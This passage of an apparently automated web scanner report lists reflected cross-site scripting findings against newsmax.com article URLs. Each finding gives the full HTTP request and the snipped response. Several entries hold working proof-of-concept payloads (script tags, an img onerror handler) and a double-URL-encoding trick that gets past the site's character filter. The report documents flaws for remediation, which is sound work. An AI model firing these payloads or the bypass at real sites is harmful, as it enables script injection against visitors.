The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66ef7'%20a%3db%20756d7b3c9ed was submitted in the REST URL parameter 2. This input was echoed as 66ef7' a=b 756d7b3c9ed in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake66ef7'%20a%3db%20756d7b3c9ed/2011/03/18/id/389964 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 63663
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Some
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake66ef7' a=b 756d7b3c9ed/2011/03/18/id/389964'
class="article_tools_link">
...[SNIP]...

1.66. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61b74'%20a%3db%20e5a37a9c0f7 was submitted in the REST URL parameter 3. This input was echoed as 61b74' a=b e5a37a9c0f7 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/201161b74'%20a%3db%20e5a37a9c0f7/03/18/id/389964 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 63663
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Some
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/201161b74' a=b e5a37a9c0f7/03/18/id/389964'
class="article_tools_link">
...[SNIP]...

1.67. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8adcf'%20a%3db%2002ec750a1ab was submitted in the REST URL parameter 4. This input was echoed as 8adcf' a=b 02ec750a1ab in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/038adcf'%20a%3db%2002ec750a1ab/18/id/389964 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 63663
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Some
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/038adcf' a=b 02ec750a1ab/18/id/389964'
class="article_tools_link">
...[SNIP]...

1.68. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67dd1'%20a%3db%2043052552722 was submitted in the REST URL parameter 5. This input was echoed as 67dd1' a=b 43052552722 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/1867dd1'%20a%3db%2043052552722/id/389964 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 63663
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Some
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/1867dd1' a=b 43052552722/id/389964'
class="article_tools_link">
...[SNIP]...

1.69. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8dbe1'%20a%3db%20db65a001b85 was submitted in the REST URL parameter 7. This input was echoed as 8dbe1' a=b db65a001b85 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/3899648dbe1'%20a%3db%20db65a001b85 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41105
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/3899648dbe1' a=b db65a001b85'
class="article_tools_link">
...[SNIP]...

1.70. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf295%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0416374c63c was submitted in the REST URL parameter 7. This input was echoed as cf295"><img src=a onerror=alert(1)>0416374c63c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964cf295%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0416374c63c HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41553
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(389964cf295"><img src=a onerror=alert(1)>0416374c63c);"
class="article_tools_link">
...[SNIP]...

1.71. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab48a"><script>alert(1)</script>634d853d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?ab48a"><script>alert(1)</script>634d853d2e=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 63881
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Some
...[SNIP]...
<a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?ab48a"><script>alert(1)</script>634d853d2e=1')"
class="article_tools_link">
...[SNIP]...

1.72. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3e8c7'><script>alert(1)</script>75f499a6f0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?3e8c7'><script>alert(1)</script>75f499a6f0c=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 63885
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Some
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?3e8c7'><script>alert(1)</script>75f499a6f0c=1'
class="article_tools_link">
...[SNIP]...

1.73. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab5a7'%20a%3db%20d6193e50b41 was submitted in the REST URL parameter 2. This input was echoed as ab5a7' a=b d6193e50b41 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-largest-moon-saturdayab5a7'%20a%3db%20d6193e50b41/2011/03/18/id/389920 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43644
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   'Supe
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturdayab5a7' a=b d6193e50b41/2011/03/18/id/389920'
class="article_tools_link">
...[SNIP]...

1.74. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db41b'%20a%3db%2017ed13ad59c was submitted in the REST URL parameter 3. This input was echoed as db41b' a=b 17ed13ad59c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011db41b'%20a%3db%2017ed13ad59c/03/18/id/389920 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43644
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   'Supe
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011db41b' a=b 17ed13ad59c/03/18/id/389920'
class="article_tools_link">
...[SNIP]...

1.75. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 798fe'%20a%3db%20f9e45a4bccc was submitted in the REST URL parameter 4. This input was echoed as 798fe' a=b f9e45a4bccc in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011/03798fe'%20a%3db%20f9e45a4bccc/18/id/389920 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43644
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   'Supe
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03798fe' a=b f9e45a4bccc/18/id/389920'
class="article_tools_link">
...[SNIP]...

1.76. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d019b'%20a%3db%20b097a50d63b was submitted in the REST URL parameter 5. This input was echoed as d019b' a=b b097a50d63b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18d019b'%20a%3db%20b097a50d63b/id/389920 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43644
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   'Supe
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18d019b' a=b b097a50d63b/id/389920'
class="article_tools_link">
...[SNIP]...

1.77. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe5'%20a%3db%2019ce17fb6fb was submitted in the REST URL parameter 7. This input was echoed as d5fe5' a=b 19ce17fb6fb in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920d5fe5'%20a%3db%2019ce17fb6fb HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41051
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920d5fe5' a=b 19ce17fb6fb'
class="article_tools_link">
...[SNIP]...

1.78. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ad2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eccfe289fe13 was submitted in the REST URL parameter 7. This input was echoed as a8ad2"><img src=a onerror=alert(1)>ccfe289fe13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

